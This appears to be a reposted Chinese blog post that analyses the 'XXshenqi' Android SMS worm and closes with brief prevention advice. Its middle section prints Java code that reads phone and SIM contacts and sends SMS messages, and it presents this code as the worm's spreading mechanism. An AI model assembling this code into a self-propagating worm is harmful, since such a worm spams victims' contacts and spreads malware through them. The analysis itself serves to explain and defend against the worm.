““XXX(机主姓名)看这个,ht://********XXshenqi.apk”最近一种超级手机病毒爆发,下面是对病毒代码的分析以及防范方法。
““XXX(机主姓名)看这个,ht://********XXshenqi.apk”最近一种超级手机病毒爆发,给百万安卓用户带来影响,病毒作者被捕,是一个年仅19岁的大学生,只是为了炫耀技术。机主收到这样的短信,开头是以发送者手机通讯录存储的名字为开头,然后再让对方点开一个网页链接。
其实熟悉android的朋友一看就明白这个病毒原理其实很简单。下面就来谈谈这个病毒的原理和防范方法。
病毒的原理有两步:
1、获取通讯录联系人名称和号码。
2、以机主的语气自动发送短信。
一、通讯录联系人的获取。
Android中的联系人都保存在一个SQLite数据库中,有兴趣的可以用re文件管理器查看。
它的路径为:/data/data/com.android.providers.contacts/databases/contacts2.db
一般我们只要关心这几张表
1.contacts 表
_id :表的ID,主要用于其它表通过contacts 表中的ID可以查到相应的数据。
display_name: 联系人名称
photo_id:头像的ID,如果没有设置联系人头像,这个字段就为空
times_contacted:通话记录的次数
last_time_contacted: 最后的通话时间
lookup :是一个持久化的储存 因为用户可能会改名子 但是它改不了lookup
2.data表
raw_contact_id:通过raw_contact_id可以找到 raw_contact表中相对的数据。
data1 到 data15 这里保存着联系人的信息 联系人名称 联系人电话号码 电子邮件 备注 等等。
3.raw_contact表
version :版本号,用于监听变化
deleted :删除标志, 0为默认 1 表示这行数据已经删除
display_name : 联系人名称
last_time_contacts : 最后联系的时间
} </span><span style="font-size:14px;">/**得到手机通讯录联系人信息**/private void getPhoneContacts() {ContentResolver resolver = mContext.getContentResolver();// 获取手机联系人Cursor phoneCursor = resolver.query(Phone.CONTENT_URI,PHONES_PROJECTION, null, null, null);if (phoneCursor != null) {while (phoneCursor.moveToNext()) {//得到手机号码String phoneNumber = phoneCursor.getString(PHONES_NUMBER_INDEX);//当手机号码为空的或者为空字段 跳过当前循环if (TextUtils.isEmpty(phoneNumber))continue;//得到联系人名称String contactName = phoneCursor.getString(PHONES_DISPLAY_NAME_INDEX);//得到联系人IDLong contactid = phoneCursor.getLong(PHONES_CONTACT_ID_INDEX);//得到联系人头像IDLong photoid = phoneCursor.getLong(PHONES_PHOTO_ID_INDEX);//得到联系人头像BitampBitmap contactPhoto = null;//photoid 大于0 表示联系人有头像 如果没有给此人设置头像则给他一个默认的if(photoid > 0 ) {Uri uri =ContentUris.withAppendedId(ContactsContract.Contacts.CONTENT_URI,contactid);InputStream input = ContactsContract.Contacts.openContactPhotoInputStream(resolver, uri);contactPhoto = BitmapFactory.decodeStream(input);}else {contactPhoto = BitmapFactory.decodeResource(getResources(), R.drawable.contact_photo);}mContactsName.add(contactName);mContactsNumber.add(phoneNumber);mContactsPhonto.add(contactPhoto);}phoneCursor.close();}
<span style="font-size:14px;">/**得到手机SIM卡联系人人信息**/
private void getSIMContacts() {ContentResolver resolver = mContext.getContentResolver();// 获取Sims卡联系人Uri uri = Uri.parse("content://icc/adn");Cursor phoneCursor = resolver.query(uri, PHONES_PROJECTION, null, null,null);if (phoneCursor != null) {while (phoneCursor.moveToNext()) {// 得到手机号码String phoneNumber = phoneCursor.getString(PHONES_NUMBER_INDEX);// 当手机号码为空的或者为空字段 跳过当前循环if (TextUtils.isEmpty(phoneNumber))continue;// 得到联系人名称String contactName = phoneCursor.getString(PHONES_DISPLAY_NAME_INDEX);//Sim卡中没有联系人头像mContactsName.add(contactName);mContactsNumber.add(phoneNumber);}phoneCursor.close();}}</span>
下面是自动发送短信的代码,给了一个EditText框来编辑短信内容,一个发送按钮来用来发送短信,一个清除按钮用来清除刚刚编辑的EditText。当然,实际中病毒不会有这些界面的,它在获取了联系人后就直接用上面得到的姓名号码等信息编辑短信,然后发送出去。
<span style="font-size:14px;">public class SMSActivity extends Activity {private EditText messageEditText;private Button sendBtn;private Button clearBtn;@Overrideprotected void onCreate(Bundle savedInstanceState) {super.onCreate(savedInstanceState);setContentView(R.layout.sms);messageEditText = (EditText) findViewById(R.id.messageedittext);sendBtn = (Button) findViewById(R.id.sendbtn);clearBtn = (Button) findViewById(R.id.clearbtn);sendBtn.setOnClickListener(new OnClickListener() {@Overridepublic void onClick(View v) {// 接收电话号码数据Bundle bundle = getIntent().getExtras();String phoneNum = bundle.getString("phoneNum");// 获取发送的内容String message = messageEditText.getText().toString();if (phoneNum == null || "".equals(phoneNum)) {Toast.makeText(SMSActivity.this,"Please input SMS Content!", Toast.LENGTH_SHORT).show();return;}// 发送短信sendSMS(phoneNum, message);}});// 置空message输入框clearBtn.setOnClickListener(new OnClickListener() {@Overridepublic void onClick(View v) {messageEditText.setText("");}});}private void sendSMS(String phoneNum, String message) {//初始化发短信SmsManager类SmsManager smsManager = SmsManager.getDefault();PendingIntent pi = PendingIntent.getActivity(this, 0, new Intent(this,VoiceActivity.class), 0);//如果短信内容长度超过70则分为若干条发if (message.length() > 70) {ArrayList<String> msgs = smsManager.divideMessage(message);for (String msg : msgs) {smsManager.sendTextMessage(phoneNum, null, msg, pi, null);}} else {smsManager.sendTextMessage(phoneNum, null, message, pi, null);}Toast.makeText(this, "Send Message Success!", Toast.LENGTH_SHORT).show();}
} </span>
三、病毒防范
看到这里你会发现你的隐私可以随便被人窥探,是的,当你使用智能手机就不存在什么隐私了,现在随便一个app都会获取你的隐私数据。不是你不会被黑,只是你没有被黑的价值····
防范病毒最好的方法就是不要随便装来路不明的软件,不要轻易给软件root权限,这样可以保证你的数据只在正规的大公司手里,然后你只要祈祷你的数据不要哪天被他们泄露了就好····
看下面,我的手机上就有16款软件有权限发短信,30款有权限访问联系人和通话记录数据,甚至有15款可以监听手机通话!!算了,反正我就算被监听了也没什么价值= =!
END
参考:
http://blog.csdn.net/zjccoder/article/details/38356237
http://blog.csdn.net/qq435757399/article/details/7947847
http://blog.csdn.net/zuolongsnail/article/details/6323513
声明: 此文观点不代表本站立场;转载须要保留原文链接;版权疑问请联系我们。
